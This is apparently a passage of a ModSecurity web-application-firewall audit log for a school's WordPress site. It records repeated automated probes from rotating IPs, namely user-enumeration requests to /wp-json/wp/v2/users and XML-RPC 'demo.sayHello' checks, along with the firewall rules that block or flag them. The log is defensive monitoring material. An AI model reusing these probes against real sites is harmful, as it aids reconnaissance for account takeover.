Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --618eac73-Z-- --641afd7e-A-- [09/May/2025:21:17:28 +0700] aB4OeB6q_ZMebht3q14jrQAAAIY 103.236.140.4 54526 103.236.140.4 8181 --641afd7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --641afd7e-C-- demo.sayHello --641afd7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --641afd7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800248883384 6183 (- - -) Stopwatch2: 1746800248883384 6183; combined=4821, p1=575, p2=3954, p3=35, p4=37, p5=125, sr=82, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --641afd7e-Z-- --e059a975-A-- [09/May/2025:21:21:37 +0700] aB4PcVoC-7ITMWTA_c9d1gAAANM 103.236.140.4 54760 103.236.140.4 8181 --e059a975-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e059a975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e059a975-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800497937497 3455 (- - -) Stopwatch2: 1746800497937497 3455; combined=1475, p1=523, p2=921, p3=0, p4=0, p5=31, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e059a975-Z-- --237c5e74-A-- [09/May/2025:21:21:47 +0700] aB4Pex6q_ZMebht3q14jrwAAAIU 103.236.140.4 54764 103.236.140.4 8181 --237c5e74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --237c5e74-C-- demo.sayHello --237c5e74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --237c5e74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800507927181 5987 (- - -) Stopwatch2: 1746800507927181 5987; combined=4363, p1=596, p2=3555, p3=30, p4=33, p5=88, sr=81, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --237c5e74-Z-- --12beb31a-A-- [09/May/2025:21:26:44 +0700] aB4QpFqQ1nOVx9fWpZSwcQAAABM 103.236.140.4 54804 103.236.140.4 8181 --12beb31a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --12beb31a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12beb31a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800804620295 3259 (- - -) Stopwatch2: 1746800804620295 3259; combined=1408, p1=450, p2=890, p3=0, p4=0, p5=68, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12beb31a-Z-- --fd4eb42b-A-- [09/May/2025:21:26:49 +0700] aB4QqR6q_ZMebht3q14jtgAAAJY 103.236.140.4 54826 103.236.140.4 8181 --fd4eb42b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd4eb42b-C-- demo.sayHello --fd4eb42b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd4eb42b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800809868639 5117 (- - -) Stopwatch2: 1746800809868639 5117; combined=4096, p1=512, p2=3334, p3=59, p4=33, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd4eb42b-Z-- --ec08ac3a-A-- [09/May/2025:21:45:36 +0700] aB4VEB6q_ZMebht3q14kZwAAAIg 103.236.140.4 55466 103.236.140.4 8181 --ec08ac3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 198.23.217.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.23.217.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec08ac3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec08ac3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746801936426085 2430 (- - -) Stopwatch2: 1746801936426085 2430; combined=1375, p1=440, p2=904, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec08ac3a-Z-- --71e3342b-A-- [09/May/2025:21:54:24 +0700] aB4XH1qQ1nOVx9fWpZSxUQAAABU 103.236.140.4 56348 103.236.140.4 8181 --71e3342b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71e3342b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71e3342b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746802463997500 3226 (- - -) Stopwatch2: 1746802463997500 3226; combined=1357, p1=456, p2=870, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71e3342b-Z-- --71973133-A-- [09/May/2025:21:54:28 +0700] aB4XJFoC-7ITMWTA_c9eGwAAANI 103.236.140.4 56356 103.236.140.4 8181 --71973133-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71973133-C-- demo.sayHello --71973133-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71973133-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746802468913510 6640 (- - -) Stopwatch2: 1746802468913510 6640; combined=4677, p1=601, p2=3830, p3=36, p4=43, p5=99, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71973133-Z-- --4099a028-A-- [09/May/2025:22:16:24 +0700] aB4cSFoC-7ITMWTA_c9eIQAAAMo 103.236.140.4 56516 103.236.140.4 8181 --4099a028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4099a028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4099a028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746803784433029 4264 (- - -) Stopwatch2: 1746803784433029 4264; combined=1744, p1=627, p2=1076, p3=0, p4=0, p5=40, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4099a028-Z-- --926ee92a-A-- [09/May/2025:22:16:30 +0700] aB4cTloC-7ITMWTA_c9eIwAAAME 103.236.140.4 56520 103.236.140.4 8181 --926ee92a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --926ee92a-C-- demo.sayHello --926ee92a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --926ee92a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746803790220212 5298 (- - -) Stopwatch2: 1746803790220212 5298; combined=3973, p1=513, p2=3246, p3=28, p4=30, p5=92, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --926ee92a-Z-- --c0925a39-A-- [09/May/2025:22:21:19 +0700] aB4dby-fAO47ojYKsMr54wAAAEM 103.236.140.4 56554 103.236.140.4 8181 --c0925a39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0925a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0925a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804079149986 1992 (- - -) Stopwatch2: 1746804079149986 1992; combined=997, p1=347, p2=622, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0925a39-Z-- --93982014-A-- [09/May/2025:22:21:27 +0700] aB4dd1qQ1nOVx9fWpZSxXgAAAAQ 103.236.140.4 56560 103.236.140.4 8181 --93982014-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93982014-C-- demo.sayHello --93982014-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93982014-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804087535471 5350 (- - -) Stopwatch2: 1746804087535471 5350; combined=4057, p1=485, p2=3266, p3=85, p4=64, p5=93, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93982014-Z-- --296f355f-A-- [09/May/2025:22:21:40 +0700] aB4dhFoC-7ITMWTA_c9eKQAAANY 103.236.140.4 56570 103.236.140.4 8181 --296f355f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --296f355f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --296f355f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804100620611 2213 (- - -) Stopwatch2: 1746804100620611 2213; combined=1062, p1=325, p2=706, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --296f355f-Z-- --6d11dd7e-A-- [09/May/2025:22:21:45 +0700] aB4diVqQ1nOVx9fWpZSxYwAAAAw 103.236.140.4 56578 103.236.140.4 8181 --6d11dd7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d11dd7e-C-- demo.sayHello --6d11dd7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d11dd7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804105699765 6585 (- - -) Stopwatch2: 1746804105699765 6585; combined=4642, p1=607, p2=3788, p3=38, p4=42, p5=99, sr=82, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d11dd7e-Z-- --f72fc37e-A-- [09/May/2025:22:25:10 +0700] aB4eVlqQ1nOVx9fWpZSxbQAAABI 103.236.140.4 56622 103.236.140.4 8181 --f72fc37e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f72fc37e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f72fc37e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804310629791 2574 (- - -) Stopwatch2: 1746804310629791 2574; combined=1433, p1=434, p2=962, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f72fc37e-Z-- --ba1d0846-A-- [09/May/2025:22:25:17 +0700] aB4eXVoC-7ITMWTA_c9eLwAAAMA 103.236.140.4 56628 103.236.140.4 8181 --ba1d0846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ba1d0846-C-- demo.sayHello --ba1d0846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba1d0846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804317204319 5453 (- - -) Stopwatch2: 1746804317204319 5453; combined=4101, p1=489, p2=3336, p3=90, p4=57, p5=78, sr=69, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba1d0846-Z-- --590f1145-A-- [09/May/2025:22:35:05 +0700] aB4gqVoC-7ITMWTA_c9eVgAAANY 103.236.140.4 56750 103.236.140.4 8181 --590f1145-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --590f1145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --590f1145-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 